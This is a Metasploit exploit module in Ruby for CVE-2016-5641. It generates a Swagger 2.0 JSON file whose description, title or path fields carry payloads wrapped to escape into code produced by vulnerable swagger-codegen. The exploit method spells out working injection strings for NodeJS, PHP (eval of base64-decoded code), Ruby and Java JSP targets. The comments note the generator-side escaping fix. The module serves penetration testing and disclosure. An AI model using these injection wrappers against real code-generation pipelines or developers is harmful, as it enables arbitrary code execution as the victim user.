##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# Gems
#
require 'base64'

#
# Project
#

# File-format module: emits a Swagger (OpenAPI 2.0) JSON document whose
# free-text fields carry the encoded payload, demonstrating CVE-2016-5641
# (see References): swagger-codegen pasted spec strings into generated source
# unescaped, so the fix on the generator side is to escape every spec string
# for the target language before emitting it. Nothing here touches the
# network; the only side effect is the file written by #exploit.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the datastore options that populate the
  # Swagger document. Every option below is interpolated verbatim into the
  # JSON by #swagger, so the defaults are deliberately short placeholders.
  #
  # @param info [Hash] module metadata merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'JSON Swagger CodeGen Parameter Injector',
      'Description' => %q{
        This module generates an Open API Specification 2.0 (Swagger) compliant
        json document that includes payload insertion points in parameters.

        In order for the payload to be executed, an attacker must convince
        someone to generate code from a specially modified swagger.json file
        within a vulnerable swagger-codgen appliance/container/api/service,
        and then to execute that generated code (or include it into software
        which will later be executed by another victim). By doing so, an
        attacker can execute arbitrary code as the victim user. The same
        vulnerability exists in the YAML format.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'ethersnowman <[email protected]>'
        ],
      'References' =>
        [
          [ 'CVE', '2016-5641' ],
          [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ]
        ],
      'Platform' => %w{ nodejs php java ruby },
      'Arch' => [ ARCH_NODEJS, ARCH_PHP, ARCH_JAVA, ARCH_RUBY ],
      'Targets' =>
        [
          ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],
          ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ],
          # NOTE(review): this target declares Platform 'unix', which is not in
          # the module-level 'Platform' list above -- confirm that is intended.
          ['Java JSP', { 'Platform' => 'unix', 'Arch' => ARCH_JAVA } ],
          ['Ruby', { 'Platform' => 'ruby', 'Arch' => ARCH_RUBY } ]
        ],
      'DisclosureDate' => '2016-06-23',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to write.', 'msf-swagger.json']),
        OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
        OptString.new('INFO_VERSION', [true, 'Swagger info version.', '1.0.0']),
        OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
        OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
        OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),
        OptString.new('BASE_PATH', [true, 'The root path of API on host.', '/']),
        OptString.new('PATH', [true, 'Path of request/response on root path.', '/a']),
        OptString.new('PATH_DESCRIPTION', [true, 'Description of a path request object', 'D']),
        OptString.new('PATH_RESPONSE_DESCRIPTION', [true, 'Description of a path response object', 'E']),
        OptString.new('DEFINITION_DESCRIPTION', [true, 'Description of an object definition.', 'F'])
      ])
  end

  # Renders the Swagger 2.0 document as a String.
  #
  # Datastore values are dropped into the JSON through plain string
  # interpolation with no escaping; that is what lets #exploit place
  # quote-breaking text into PATH, INFO_DESCRIPTION or INFO_TITLE. Once a
  # payload has been injected the result is not necessarily well-formed JSON.
  #
  # @return [String] the swagger.json contents built from the current datastore
  def swagger
    %Q(
    {
      "swagger": "2.0",
      "info": {
        "description": "#{datastore['INFO_DESCRIPTION']}",
        "version": "#{datastore['INFO_VERSION']}",
        "title": "#{datastore['INFO_TITLE']}"
      },
      "schemes": [
        "#{datastore['SWAGGER_SCHEME']}"
      ],
      "host": "#{datastore['SWAGGER_HOST']}",
      "basePath": "#{datastore['BASE_PATH']}",
      "produces": [
        "application/json"
      ],
      "consumes": [
        "application/json"
      ],
      "paths": {
        "#{datastore['PATH']}": {
          "get": {
            "description": "#{datastore['PATH_DESCRIPTION']}",
            "responses": {
              "200": {
                "description": "#{datastore['PATH_RESPONSE_DESCRIPTION']}",
                "schema": {
                  "$ref": "#/definitions/d"
                }
              }
            }
          }
        }
      },
      "definitions": {
        "d": {
          "type": "object",
          "description": "#{datastore['DEFINITION_DESCRIPTION']}",
          "properties": {
            "id": {
              "type": "integer",
              "format": "int64"
            }
          }
        }
      }
    }
    )
  end

  # Wraps the encoded payload for the selected target architecture, stores it
  # in the datastore option that will carry it, then prints and writes the
  # document.
  #
  # Each branch pairs a datastore key (payload_loc) with prefix/suffix text
  # around the payload; the exact prefix/suffix strings are target-specific
  # and are taken as given here.
  #
  # @raise [IncompatiblePayloadError] when payload.arch[0] is none of
  #   nodejs / php / ruby / java
  def exploit
    case payload.arch[0]
    when 'nodejs'
      # Payload is placed in the path key; double quotes inside the encoded
      # payload are backslash-escaped so the enclosing JSON string survives.
      payload_loc = 'PATH'
      payload_prefix = "/a');};};return exports;}));"
      payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"
      wrapped_payload = payload_prefix + payload.encoded.gsub(/"/, '\\"') + payload_suffix
    when 'php'
      # Payload is base64-encoded (strict, no line breaks) and placed in the
      # info description.
      payload_loc = 'INFO_DESCRIPTION'
      payload_prefix = "*/ namespace foobar; eval(base64_decode('"
      payload_suffix = "')); /*"
      wrapped_payload = payload_prefix +
        Base64.strict_encode64(payload.encoded) +
        payload_suffix
    when 'ruby'
      # Payload is placed unmodified in the info title, fenced by the Ruby
      # embedded-document delimiters =end / =begin.
      payload_loc = 'INFO_TITLE'
      payload_prefix = "=end "
      payload_suffix = "=begin "
      wrapped_payload = payload_prefix + payload.encoded + payload_suffix
    when 'java'
      # JSP payload is flattened to a single line for the path key: the
      # page-import directive becomes a plain import, scriptlet delimiters are
      # stripped, double quotes are escaped and newlines become spaces.
      payload_loc = 'PATH'
      payload_prefix = %q{a\\\"; "}
      p = payload.encoded.gsub(/<%@page import="/, 'import ')
      p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
      p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
      wrapped_payload = payload_prefix + p
    else
      raise IncompatiblePayloadError.new(datastore['PAYLOAD'])
    end

    # Overwrite the chosen option so #swagger interpolates the wrapped payload.
    datastore[payload_loc] = wrapped_payload

    # The full document is echoed to the console and written to FILENAME
    # (file_create is provided by Msf::Exploit::FILEFORMAT).
    print_status swagger
    file_create swagger
  end
end